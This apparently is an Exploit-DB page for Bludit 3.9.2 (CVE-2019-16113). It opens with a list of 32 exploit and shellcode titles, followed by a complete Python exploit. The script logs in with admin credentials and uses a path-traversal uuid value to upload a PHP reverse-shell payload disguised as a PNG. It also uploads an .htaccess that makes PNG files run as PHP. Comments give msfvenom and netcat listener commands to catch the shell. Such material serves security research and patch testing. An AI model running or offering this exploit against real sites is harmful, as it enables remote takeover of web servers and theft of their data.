
32 changes to exploits/shellcodes Calavera UpLoader 3.5 - 'FTP Logi' Denial of Service (PoC + SEH Overwrite) Nidesoft DVD Ripper 5.2.18 - Local Buffer Overflow (SEH) Frigate Professional 3.36.0.9 - 'Pack File' Buffer Overflow (SEH Egghunter) DiskBoss 7.7.14 - 'Reports and Data Directory' Buffer Overflow (SEH Egghunter) Socusoft Photo to Video Converter Professional 8.07 - 'Output Folder' Buffer Overflow (SEH Egghunter) Port Forwarding Wizard 4.8.0 - Buffer Overflow (SEH) Free MP3 CD Ripper 2.8 - Stack Buffer Overflow (SEH + Egghunter) docPrint Pro 8.0 - 'Add URL' Buffer Overflow (SEH Egghunter) GOautodial 4.0 - Persistent Cross-Site Scripting (Authenticated) ManageEngine Applications Manager 13 - 'MenuHandlerServlet' SQL Injection INNEO Startup TOOLS 2018 M040 13.0.70.3804 - Remote Code Execution UBICOD Medivision Digital Signage 1.5.1 - Cross-Site Request Forgery (Add Admin) WordPress Plugin Email Subscribers & Newsletters 4.2.2 - Unauthenticated File Download WordPress Plugin Email Subscribers & Newsletters 4.2.2 - 'hash' SQL Injection (Unauthenticated) Bludit 3.9.2 - Directory Traversal LibreHealth 2.0.0 - Authenticated Remote Code Execution Online Course Registration 1.0 - Unauthenticated Remote Code Execution elaniin CMS - Authentication Bypass Koken CMS 0.22.24 - Arbitrary File Upload (Authenticated) PandoraFMS 7.0 NG 746 - Persistent Cross-Site Scripting Bio Star 2.8.2 - Local File Inclusion Webtareas 2.1p - Arbitrary File Upload (Authenticated) F5 Big-IP 13.1.3 Build 0.0.6 - Local File Inclusion Sickbeard 0.1 - Cross-Site Request Forgery (Disable Authentication) Socket.io-file 2.0.31 - Arbitrary File Upload pfSense 2.4.4-p3 - Cross-Site Request Forgery Virtual Airlines Manager 2.6.2 - Persistent Cross-Site Scripting Rails 5.0.1 - Remote Code Execution Linux/x86 - ASLR deactivation polymorphic Shellcode (124 bytes) Linux/x86 - Egghunter(0x50905090) + sigaction + execve(/bin/sh) Shellcode (35 bytes) Windows/x86 - Download using mshta.exe Shellcode (100 bytes)
132 lines
No EOL
5.4 KiB
Text
132 lines
No EOL
5.4 KiB
Text
# Title: Bludit 3.9.2 - Directory Traversal
|
|
# Author: James Green
|
|
# Date: 2020-07-20
|
|
# Vendor Homepage: https://www.bludit.com
|
|
# Software Link: https://github.com/bludit/bludit
|
|
# Version: 3.9.2
|
|
# Tested on: Linux Ubuntu 19.10 Eoan
|
|
# CVE: CVE-2019-16113
|
|
#
|
|
# Special Thanks to Ali Faraj (@InfoSecAli) and authors of MSF Module https://www.exploit-db.com/exploits/47699
|
|
|
|
#### USAGE ####
|
|
# 1. Create payloads: .png with PHP payload and the .htaccess to treat .pngs like PHP
|
|
# 2. Change hardcoded values: URL is your target webapp, username and password is admin creds to get to the admin dir
|
|
# 3. Run the exploit
|
|
# 4. Start a listener to match your payload: `nc -nlvp 53`, meterpreter multi handler, etc
|
|
# 5. Visit your target web app and open the evil picture: visit url + /bl-content/tmp/temp/evil.png
|
|
|
|
#!/usr/bin/env python3
|
|
|
|
import requests
|
|
import re
|
|
import argparse
|
|
import random
|
|
import string
|
|
import base64
|
|
from requests.exceptions import Timeout
|
|
|
|
url = 'http://127.0.0.1' # CHANGE ME
|
|
username = 'James' # CHANGE ME
|
|
password = 'Summer2020' # CHANGE ME
|
|
|
|
# msfvenom -p php/reverse_php LHOST=127.0.0.1 LPORT=53 -f raw -b '"' > evil.png
|
|
# echo -e "<?php $(cat evil.png)" > evil.png
|
|
payload = 'evil.png' # CREATE ME
|
|
|
|
# echo "RewriteEngine off" > .htaccess
|
|
# echo "AddType application/x-httpd-php .png" >> .htaccess
|
|
payload2 = '.htaccess' # CREATE ME
|
|
|
|
def login(url,username,password):
|
|
""" Log in with provided admin creds, grab the cookie once authenticated """
|
|
|
|
session = requests.Session()
|
|
login_page = session.get(url + "/admin/")
|
|
csrf_token = re.search('input.+?name="tokenCSRF".+?value="(.+?)"',
|
|
login_page.text
|
|
).group(1)
|
|
cookie = ((login_page.headers["Set-Cookie"]).split(";")[0].split("=")[1])
|
|
data = {"save":"",
|
|
"password":password,
|
|
"tokenCSRF":csrf_token,
|
|
"username":username}
|
|
headers = {"Origin":url,
|
|
"Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
|
|
"Upgrade-Insecure-Requests":"1",
|
|
"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0",
|
|
"Connection":"close",
|
|
"Referer": url + "/admin/",
|
|
"Accept-Language":"es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3",
|
|
"Accept-Encoding":"gzip, deflate",
|
|
"Content-Type":"application/x-www-form-urlencoded"
|
|
}
|
|
cookies = {"BLUDIT-KEY":cookie}
|
|
response = session.post(url + "/admin/",
|
|
data=data,
|
|
headers=headers,
|
|
cookies=cookies,
|
|
allow_redirects = False
|
|
)
|
|
|
|
print("cookie: " + cookie)
|
|
return cookie
|
|
|
|
def get_csrf_token(url,cookie):
|
|
""" Grab the CSRF token from an authed session """
|
|
|
|
session = requests.Session()
|
|
headers = {"Origin":url,
|
|
"Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
|
|
"Upgrade-Insecure-Requests":"1",
|
|
"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0",
|
|
"Connection":"close",
|
|
"Referer":url + "/admin/",
|
|
"Accept-Language":"es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3",
|
|
"Accept-Encoding":"gzip, deflate"}
|
|
cookies = {"BLUDIT-KEY":cookie}
|
|
response = session.get(url + "/admin/dashboard",
|
|
headers=headers,
|
|
cookies=cookies
|
|
)
|
|
csrf_token = response.text.split('var tokenCSRF = "')[1].split('"')[0]
|
|
|
|
print("csrf_token: " + csrf_token)
|
|
return csrf_token
|
|
|
|
def upload_evil_image(url, cookie, csrf_token, payload, override_uuid=False):
|
|
""" Upload files required for to execute PHP from malicious image files. Payload and .htaccess """
|
|
|
|
session = requests.Session()
|
|
files= {"images[]": (payload,
|
|
open(payload, "rb"),
|
|
"multipart/form-data",
|
|
{"Content-Type": "image/png", "filename":payload}
|
|
)}
|
|
if override_uuid:
|
|
data = {"uuid": "../../tmp/temp",
|
|
"tokenCSRF":csrf_token}
|
|
else:
|
|
# On the vuln app, this line occurs first:
|
|
# Filesystem::mv($_FILES['images']['tmp_name'][$uuid], PATH_TMP.$filename);
|
|
# Even though there is a file extension check, it won't really stop us
|
|
# from uploading the .htaccess file.
|
|
data = {"tokenCSRF":csrf_token}
|
|
headers = {"Origin":url,
|
|
"Accept":"*/*",
|
|
"X-Requested-With":"XMLHttpRequest",
|
|
"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0",
|
|
"Connection":"close",
|
|
"Referer":url + "/admin/new-content",
|
|
"Accept-Language":"es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3",
|
|
"Accept-Encoding":"gzip, deflate",
|
|
}
|
|
cookies = {"BLUDIT-KEY":cookie}
|
|
response = session.post(url + "/admin/ajax/upload-images", data=data, files=files, headers=headers, cookies=cookies)
|
|
print("Uploading payload: " + payload)
|
|
|
|
if __name__ == "__main__":
|
|
cookie = login(url, username, password)
|
|
token = get_csrf_token(url, cookie)
|
|
upload_evil_image(url, cookie, token, payload, True)
|
|
upload_evil_image(url, cookie, token, payload2) |